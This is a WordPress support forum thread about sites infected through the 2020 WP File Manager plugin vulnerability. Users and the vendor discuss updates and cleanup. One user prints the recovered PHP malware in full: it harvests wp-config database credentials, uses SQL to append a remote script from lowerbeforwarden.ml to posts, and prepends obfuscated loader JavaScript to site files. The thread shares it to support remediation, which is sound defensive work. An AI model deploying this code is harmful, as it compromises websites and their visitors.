Got hacked – Zero day vulnerability

FAQ My site was hacked

Hello @fierevere,
this is published recently on both Sucuri and Wordfence websites, take a look at this:

https://blog.sucuri.net/2020/09/critical-vulnerability-file-manager-affecting-700k-wordpress-websites.html

https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/

• This reply was modified 4 years, 6 months ago by Фондаци?а Гласник.

@glasnik
Please dont publish security related links.
Whoever subscribed to Sucuri and WF blogs can read it anyway.

Please update to version 6.9 of this plugin. Issue is fixed.
If you have been hacked:
Carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures and start backing up your site.

• This reply was modified 4 years, 6 months ago by Yui.

thank you. I installed WordFence and it found a lot of issues. What a nightmare

I wish that WP File Manager would have somehow notified its users of the hack, so we could have upgraded. Or marked the update as a critical update

Hi @aneeshasg,

The File Manager Community was notified of the security update.

Please make sure you update the File Manager plugin to v6.9 if you are using File Manager Free, or to v7.9 if you are using File Manager Pro. Here is some documentation to assist you with the process: https://filemanagerpro.io/article/how-to-download-latest-version-of-file-manager-pro/

If you have any further questions, please reach out to us using this link and we would be happy to further assist you with this.
https://filemanagerpro.io/contact/

Thanks!

Seems the same problem I have. My 3 WordPress sites was hacked, and other 3 WP sites was not. The difference between them that hacked sites has installed WP File manager. Yesterday infected sites crashed. While investigation this problem I found that first contamination was 21.08.2020.

• This reply was modified 4 years, 6 months ago by crimea.
• This reply was modified 4 years, 6 months ago by Yui. Reason: link removed

Hi Everyone, I script that caused all this has been added below. I have commented few bits in the code so it doesn’t affect anything.

This came from wp-file-manager plugin folder. The first step would be to remove this folder from plugins direction.

<?php echo "ssqqss>>>";
error_reporting(E_ALL);
ini_set('display_errors', 1);

search_file_js($_SERVER['DOCUMENT_ROOT'] . "/../../../../../../../../", ".js");
die();

function get_var_reg($pat, $text)
{

	if ($c = preg_match_all("/" . $pat . "/is", $text, $matches)) {
		return $matches[1][0];
	}

	return "";
}
function search_file_ms($dir, $file_to_search)
{

	$search_array = array();

	$files = scandir($dir);

	if ($files == false) {

		$dir = substr($dir, 0, -3);
		if (strpos($dir, '../') !== false) {

			@search_file_ms($dir, $file_to_search);
			return;
		}
		if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") {

			@search_file_ms($dir, $file_to_search);
			return;
		}
	}

	foreach ($files as $key => $value) {

		$path = realpath($dir . DIRECTORY_SEPARATOR . $value);

		if (!is_dir($path)) {
			if (strpos($value, $file_to_search) !== false) {

				show_sitenames($path);
			}
		} else if ($value != "." && $value != "..") {

			@search_file_ms($path, $file_to_search);
		}
	}
}
function show_sitenames($file)
{
	$content = @file_get_contents($file);
	if (strpos($content, "DB_NAME") !== false) {

		$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]", $content);
		$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]", $content);
		$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]", $content);
		$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]", $content);

		// Create connection
		$conn = new mysqli($host, $user, $pass);

		// Check connection
		if ($conn->connect_error) {
		} else {

			$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE <code>TABLE_NAME</code> LIKE '%post%'";
			$result = $conn->query($q);
			if ($result->num_rows > 0) {
				while ($row = $result->fetch_assoc()) {
					$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . "  LIMIT 1 ";
					$result2 = $conn->query($q2);
					if ($result2->num_rows > 0) {
						while ($row2 = $result2->fetch_assoc()) {
							$val = $row2['post_content'];
							if (strpos($val, "scripts.lowerbeforwarden.ml") === true) {
								var_dump($val); exit;
								if (strpos($val, "scripts.lowerbeforwarden.ml") === false) {

									$q3 = "UPDATE " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . " set post_content = CONCAT(post_content,\"<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%scripts.lowerbeforwarden.ml%'";
									$conn->query($q3);
									echo "sql:" . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"];
								} else {
								}
							}
						}
					} else {
					}
				}
			} else {
			}
			$conn->close();
		}
	}
}

function search_file($dir, $file_to_search)
{

	$files = @scandir($dir);

	if ($files == false) {

		$dir = substr($dir, 0, -3);
		if (strpos($dir, '../') !== false) {

			//@search_file($dir, $file_to_search);
			return;
		}
		if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") {

			//@search_file($dir, $file_to_search);
			return;
		}
	}

	foreach ($files as $key => $value) {

		$path = realpath($dir . DIRECTORY_SEPARATOR . $value);

		if (!is_dir($path)) {
			if (strpos($value, $file_to_search) !== false && (strpos($value, ".ph") !== false || strpos($value, ".htm")) !== false) {

				//make_it($path);
			}
		} else if ($value != "." && $value != "..") {

			//search_file($path, $file_to_search);
		}
	}
}

function search_file_index($dir, $file_to_search)
{

	$files = @scandir($dir);

	if ($files == false) {

		$dir = substr($dir, 0, -3);
		if (strpos($dir, '../') !== false) {

			//search_file_index($dir, $file_to_search);
			return;
		}
		if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") {

			//search_file_index($dir, $file_to_search);
			return;
		}
	}

	foreach ($files as $key => $value) {

		$path = realpath($dir . DIRECTORY_SEPARATOR . $value);

		if (!is_dir($path)) {
			if (strpos($value, $file_to_search) !== false && (strpos($value, ".ph") !== false || strpos($value, ".htm")) !== false) {

				//make_it_index($path);
			}
		} else if ($value != "." && $value != "..") {

			//search_file_index($path, $file_to_search);
		}
	}
}
function search_file_js($dir, $file_to_search)
{

	$files = @scandir($dir);
	if ($files == false) {

		$dir = substr($dir, 0, -3);
		if (strpos($dir, '../') !== false) {

			//@search_file_js($dir, $file_to_search);
			return;
		}
		if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") {

			//@search_file_js($dir, $file_to_search);
			return;
		}
	}

	foreach ($files as $key => $value) {

		$path = realpath($dir . DIRECTORY_SEPARATOR . $value);

		if (!is_dir($path)) {
			if (strpos($value, $file_to_search) !== false && (strpos($value, ".js") !== false)) {

				//make_it_js($path);
			}
		} else if ($value != "." && $value != "..") {

			//search_file_js($path, $file_to_search);
		}
	}
}

function make_it_js($f)
{
	$g = file_get_contents($f);

	if (strpos($g, '115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108') !== false) {
	} else {

		$l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
		$g = file_get_contents($f);
		$g = $l2 . $g;
		@system('chmod 777 ' . $f);
		@file_put_contents($f, $g);
		echo "js:" . $f . "\r\n";
	}
}
function make_it_index($f)
{

	if (strpos($g, '115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108') !== false || strpos($g, 'scripts.lowerbeforwarden.ml') !== false) {
	} else {
		$l2 = "<script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script>";
		$g = file_get_contents($f);
		$g = $l2 . $g;

		@system('chmod 777 ' . $f);
		@file_put_contents($f, $g);
		echo "in:" . $f . "\r\n";
	}
}

function make_it($f)
{
	$g = file_get_contents($f);
	if (strpos($g, '115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108') !== false) {
	} else {
		$l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
		if (strpos($g, '<head>') !== false) {
			$b = str_replace("<head>", "<head>" . $l2, $g);
			@system('chmod 777 ' . $f);
			@file_put_contents($f, $b);
			echo "hh:" . $f . "\r\n";
		}
		if (strpos($g, '</head>') !== false) {
			$b = str_replace("</head>", $l2 . "</head>", $g);
			@system('chmod 777 ' . $f);
			@file_put_contents($f, $b);
			echo "hh:" . $f . "\r\n";
		}
	}
}

I was trying to reserve engineer the hack.

The code attacks js file and index file. It also attacks any file that has <head> on it.

The first step would be to remove occurance of all these scripts. I used VSCode to remove them by searching for:

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

and

<script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script>

You can quickly remove these by running find and replace.

After that, run this script on your wp sql database.

UPDATE wp_posts
SET 
    post_content = REPLACE(post_content,
        "<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>",
        '')
WHERE
    post_content LIKE '%lowerbeforwarden%';

If you have w3 cache or any other cache plugin. Remove the cache directory.

It had infected around 12 plus sites on my server including any other PHP projects that were on the server.

Hope it helps.

Hi @aneeshasg

Please contact us at https://filemanagerpro.io/contact, we would like to schedule a call to work with you personally to help resolve this issue.

Thanks!

Hi @crimeahrg

Please contact us at https://filemanagerpro.io/contact, we would like to schedule a call to work with you personally to help resolve this issue.

Thanks!

Hello,

A vulnerability in the plugin caused many many sites to be infected with a virus called “lowerbeforwarden”. Vulnerable file in the WP File Manager plugin enabled the attackers to inject virus into sites.

A fix you can try:
If you are able access the admin panel, then first install this plugin called “MalCure”, run a scan. In the scan it will show you all the infected files, then you can use FTP to search through the files, delete the files or just remove the part that’s the virus code.

Next you may also want to fully replace wp-admin, wp-includes folders on your WP installation to be safe.

A little more detailed steps:

https://www.stramaxon.com/2020/04/wordpress-ico-malware-redirect.html

The cleanup is mostly deleting the infected files and updating the vulnerable plugin.

@mndpsingh287 While I appreciate you offering helping people with hacked sites, it is still not fair that you have still not posted anything to document the ways and methods to disinfect the site, instead you are offering help over emails that’s not doing anything to many of your plugin users who just wants to get rid of the virus and would do it themselves if they know how.

Hi @mndpsingh287
Thanks for the offer. For now, I uninstalled the plugin, so don’t really need help anymore.

I had to clean up the site and files (painful and needed deep technical help from someone).

Is there any evidence that through this exploit, the hackers were able to inject code/make changes in the database or any other part of the file systems outside of WordPress?

Hi @depy thank you for sharing this fix!

To our valued File Manager community,

We have a few updates to share with you on what is coming up:
– We are in the process of developing a solution to share publicly by early next week
– We are preparing a new release for more security in the coming week
– We are reviewing opportunities for the community to participate in programs to support us in identifying and finding solutions for bugs or vulnerabilities

Stay tuned!

In the meantime, we still ask anyone who needs assistance to reach out to us and we will provide you with custom support to get you through any issues you are experiencing as a result of this vulnerability. Contact us at https://filemanagerpro.io/contact?

Thanks!

• This reply was modified 4 years, 6 months ago by mndpsingh287.